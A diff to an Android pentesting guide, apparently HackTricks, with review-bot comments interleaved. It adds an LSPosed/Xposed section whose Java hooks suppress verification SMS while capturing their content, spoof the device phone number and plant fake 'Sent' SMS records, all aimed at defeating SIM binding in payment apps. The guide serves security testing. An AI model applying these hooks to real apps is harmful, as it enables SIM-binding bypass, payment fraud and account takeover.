@@ -334,6 +334,69 @@ apk-mitm app.apk
install-burp-certificate.md
{{#endref}}


## LSPosed/Xposed Hooking Abuse (Telephony/SMS)

On rooted devices, LSPosed/Xposed modules can hook Java telephony/SMS APIs at runtime, keeping the APK unmodified on disk while fully controlling what the app sees. This is commonly abused to bypass SIM‑binding flows that trust local telephony APIs or local SMS provider state.

Key primitives
- **Suppress outgoing verification SMS** while exfiltrating the token by short‑circuiting `SmsManager.sendTextMessage` in `beforeHookedMethod`.
- **Spoof MSISDN/line number** by forcing `TelephonyManager.getLine1Number()` and `SubscriptionInfo.getNumber()` to return an attacker‑controlled value.
- **Plant a fake “Sent” record** in the SMS provider so apps that check local SMS history see a successful send even if the carrier never received it.

Example: block SMS dispatch and capture content
```java
XposedHelpers.findAndHookMethod(
"android.telephony.SmsManager",
lpparam.classLoader,
"sendTextMessage",
String.class, String.class, String.class, PendingIntent.class, PendingIntent.class,
new XC_MethodHook() {
protected void beforeHookedMethod(MethodHookParam param) {
String body = (String) param.args[2];
// exfiltrate body to operator channel
param.setResult(null); // suppress real SMS send
}
}
);
```

Example: spoof device phone number
```java
XposedHelpers.findAndHookMethod(
"android.telephony.TelephonyManager",
lpparam.classLoader,
"getLine1Number",
new XC_MethodHook() {
protected void afterHookedMethod(MethodHookParam param) {
param.setResult(spoofedMsisdn);
}
}
);
```
```java
XposedHelpers.findAndHookMethod(
"android.telephony.SubscriptionInfo",
lpparam.classLoader,
"getNumber",
new XC_MethodHook() {
protected void afterHookedMethod(MethodHookParam param) {
param.setResult(spoofedMsisdn);
}
}
);
```

Example: inject a fake “Sent” SMS record
```java
ContentValues v = new ContentValues();
v.put("address", dest);
v.put("body", body);
v.put("type", 2); // sent
v.put("status", 0); // success
context.getContentResolver().insert(Uri.parse("content://sms/sent"), v);
```

## Handy command cheat‑sheet

```bash
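Review bot: the three Java snippets use `lpparam`, `spoofedMsisdn`, `context`, `dest` and `body` without introducing them, so the examples do not stand on their own as written; a one-line note saying where each comes from (the package-load parameter handed to the module, and values supplied by the module's own configuration) would make them self-contained. The section also names the root cause, apps trusting local telephony APIs and local SMS provider state, but stops short of the mitigation that follows from it: a closing sentence that SIM binding has to be verified server-side (the backend confirming the verification SMS actually arrived at the expected number, combined with device-integrity signals) rather than from `getLine1Number()`, `getNumber()` or `content://sms` would give readers hardening an app the actionable conclusion, since on a hooked device every one of those local checks is attacker-controlled.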
@@ -396,5 +459,5 @@ Notes
- [phantom-frida (stealth Frida server builder)](https://github.com/TheQmaks/phantom-frida)
- [Frida OkHttp4 SSL pinning bypass script](https://github.com/Zero3141/Frida-OkHttp-Bypass)
- [XDA guide to strong Play Integrity bypass (2025)](https://xdaforums.com/t/updated-11-17-2025-guide-get-strong-integrity-fix-banking-apps-revolut-google-wallet-android-16-working.4753805/)

- [Weaponizing LSPosed: Remote SMS Injection and Identity Spoofing in Modern Payment Ecosystems](https://www.cloudsek.com/blog/weaponizing-lsposed-remote-sms-injection-and-identity-spoofing-in-modern-payment-ecosystems-2)
{{#include ../../banners/hacktricks-training.md}}
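Review bot: the new CloudSEK reference is the source the LSPosed/Xposed section added earlier in this change is built on, yet nothing in that section links to it; citing it inline there lets readers trace the three primitives back to the write-up. Also confirm the rendered result keeps a blank line between the last bullet and `{{#include ../../banners/hacktricks-training.md}}`: in this view the include directly follows the new bullet, and without the separating blank line the included banner can be parsed as a continuation of that list item.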